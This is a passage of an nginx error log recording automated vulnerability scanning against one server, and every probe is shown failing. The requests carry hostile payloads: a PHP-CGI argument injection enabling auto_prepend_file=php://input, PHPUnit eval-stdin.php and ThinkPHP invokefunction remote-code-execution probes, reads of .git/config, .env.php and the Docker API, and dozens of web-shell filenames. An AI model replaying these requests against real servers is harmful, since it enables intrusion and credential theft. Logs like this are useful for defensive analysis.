23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:36 [error] 429#429: *316777 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:36 [error] 429#429: *316777 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:37 [error] 429#429: *316777 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:37 [error] 429#429: *316777 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:37 [error] 429#429: *316777 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:38 [error] 429#429: *316777 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:38 [error] 429#429: *316777 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:38 [error] 429#429: *316777 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:38 [error] 429#429: *316777 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:39 [error] 429#429: *316777 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:39 [error] 429#429: *316777 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:40 [error] 429#429: *316777 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:40 [error] 429#429: *316777 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:40 [error] 429#429: *316777 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:40 [error] 429#429: *316777 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:41 [error] 429#429: *316777 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:41 [error] 429#429: *316777 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:41 [error] 429#429: *316777 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:42 [error] 429#429: *316777 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:42 [error] 429#429: *316777 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:42 [error] 429#429: *316777 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:43 [error] 429#429: *316777 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:43 [error] 429#429: *316777 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:43 [error] 429#429: *316777 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:43 [error] 429#429: *316777 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:44 [error] 429#429: *316777 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:44 [error] 429#429: *316777 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:44 [error] 429#429: *316777 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:45 [error] 429#429: *316777 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:45 [error] 429#429: *316777 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:45 [error] 429#429: *316777 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:45 [error] 429#429: *316777 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:46 [error] 429#429: *316777 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:46 [error] 429#429: *316777 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:46 [error] 429#429: *316777 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:46 [error] 429#429: *316777 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:47 [error] 429#429: *316777 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:47 [error] 429#429: *316777 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:47 [error] 429#429: *316777 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:47 [error] 429#429: *316777 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:06:48 [error] 429#429: *316777 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 45.95.212.153, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:50:11 [error] 430#430: *316810 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:53:15 [error] 430#430: *316814 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 5.252.153.185, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/19 14:57:00 [error] 430#430: *316819 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 45.91.64.8, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 14:57:01 [error] 430#430: *316821 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 45.91.64.8, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 15:18:52 [error] 430#430: *316835 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:53 [error] 430#430: *316835 open() "/var/www/html/var/www/tagtek/good.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /var/www/tagtek/good.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:53 [error] 430#430: *316835 open() "/var/www/html/minishell.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /minishell.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:54 [error] 430#430: *316835 open() "/var/www/html/user.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /user.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:54 [error] 430#430: *316835 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //404.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:54 [error] 430#430: *316835 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:54 [error] 430#430: *316835 open() "/var/www/html/nae.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /nae.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:55 [error] 430#430: *316835 open() "/var/www/html/tx38.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /tx38.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:55 [error] 430#430: *316835 open() "/var/www/html/b.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /b.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:55 [error] 430#430: *316835 open() "/var/www/html/cw.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /cw.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:55 [error] 430#430: *316835 open() "/var/www/html/h.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /h.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:56 [error] 430#430: *316835 open() "/var/www/html/wp-2020.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-2020.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:56 [error] 430#430: *316835 open() "/var/www/html/f2f.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /f2f.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:56 [error] 430#430: *316835 open() "/var/www/html/eru.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /eru.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:57 [error] 430#430: *316835 open() "/var/www/html/uploader.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /uploader.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:57 [error] 430#430: *316835 open() "/var/www/html/.env.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /.env.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:57 [error] 430#430: *316835 open() "/var/www/html/udd.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /udd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:57 [error] 430#430: *316835 open() "/var/www/html/xae.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xae.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:57 [error] 430#430: *316835 open() "/var/www/html/pi.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /pi.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:58 [error] 430#430: *316835 open() "/var/www/html/wp-db.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-db.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:58 [error] 430#430: *316835 open() "/var/www/html/lx.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /lx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:58 [error] 430#430: *316835 open() "/var/www/html/batm.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /batm.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:59 [error] 430#430: *316835 open() "/var/www/html/wp-add.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-add.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:59 [error] 430#430: *316835 open() "/var/www/html/lm13.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /lm13.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:18:59 [error] 430#430: *316835 open() "/var/www/html/wan.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wan.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:00 [error] 430#430: *316835 open() "/var/www/html/bypass403.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bypass403.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:00 [error] 430#430: *316835 open() "/var/www/html/444.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /444.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:00 [error] 430#430: *316835 open() "/var/www/html/fosil.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /fosil.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:00 [error] 430#430: *316835 open() "/var/www/html/xzs.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xzs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:00 [error] 430#430: *316835 open() "/var/www/html/led.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /led.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:01 [error] 430#430: *316835 open() "/var/www/html/LA.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /LA.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:01 [error] 430#430: *316835 open() "/var/www/html/wsz.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wsz.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:01 [error] 430#430: *316835 open() "/var/www/html/edit.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /edit.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:01 [error] 430#430: *316835 open() "/var/www/html/flower2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /flower2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:02 [error] 430#430: *316835 open() "/var/www/html/ans.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ans.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:02 [error] 430#430: *316835 open() "/var/www/html/bs1.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bs1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:02 [error] 430#430: *316835 open() "/var/www/html/o2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /o2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:03 [error] 430#430: *316835 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:03 [error] 430#430: *316835 open() "/var/www/html/past.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /past.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:03 [error] 430#430: *316835 open() "/var/www/html/ws37.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws37.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:03 [error] 430#430: *316835 open() "/var/www/html/wpup.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wpup.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:04 [error] 430#430: *316835 open() "/var/www/html/defaul.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /defaul.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:04 [error] 430#430: *316835 open() "/var/www/html/mc.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /mc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:04 [error] 430#430: *316835 open() "/var/www/html/woh.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /woh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:04 [error] 430#430: *316835 open() "/var/www/html/lok.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /lok.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:05 [error] 430#430: *316835 open() "/var/www/html/991176.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /991176.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:05 [error] 430#430: *316835 open() "/var/www/html/ws45.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws45.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:05 [error] 430#430: *316835 open() "/var/www/html/ws33.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws33.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:05 [error] 430#430: *316835 open() "/var/www/html/tiny.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /tiny.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:06 [error] 430#430: *316835 open() "/var/www/html/goat1.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /goat1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:06 [error] 430#430: *316835 open() "/var/www/html/xeqdlun.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xeqdlun.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:06 [error] 430#430: *316835 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:06 [error] 430#430: *316835 open() "/var/www/html/ws34.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws34.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:07 [error] 430#430: *316835 open() "/var/www/html/b0.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /b0.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:07 [error] 430#430: *316835 open() "/var/www/html/var/www/tagtek/bless.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /var/www/tagtek/bless.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:07 [error] 430#430: *316835 open() "/var/www/html/rcc.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /rcc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:07 [error] 430#430: *316835 open() "/var/www/html/xp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:08 [error] 430#430: *316835 open() "/var/www/html/cux.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /cux.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:08 [error] 430#430: *316835 open() "/var/www/html/family.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /family.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:08 [error] 430#430: *316835 open() "/var/www/html/ss.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ss.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:08 [error] 430#430: *316835 open() "/var/www/html/Njima.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /Njima.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:09 [error] 430#430: *316835 open() "/var/www/html/wp-2018.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-2018.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" 